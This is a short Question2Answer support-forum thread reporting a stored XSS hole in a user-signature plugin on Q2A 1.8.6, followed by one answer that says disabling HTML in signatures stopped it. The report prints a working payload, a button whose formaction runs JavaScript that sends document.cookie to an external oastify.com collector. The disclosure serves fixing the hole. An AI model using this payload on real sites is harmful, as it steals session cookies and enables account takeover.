Welcome to the Question2Answer Q&A. There's also a demo if you just want to try it out.
+2 votes
in Plugins by
recategorized by

It's possible to inject JS into user's signature that leads to account takeover.

Attackers change their signature to the following XSS payload and such JS will be executed is uses click such button.

Hi<button type="test" formaction="javascript: alert('You have been hacked!'), fetch('https://xxxxxxxxxxxxxxxxxxxx.oastify.com?c=' +document.cookie)">CLICK HERE</button>

See example from our forum.


Is there a solution to avoid this?

We use following plugin for Signature: https://github.com/NoahY/q2a-signatures


Q2A version: 1.8.6

1 Answer

+1 vote
Best answer

I have "fixed" the case (if we can say that) by enabling an option to not allow HTML.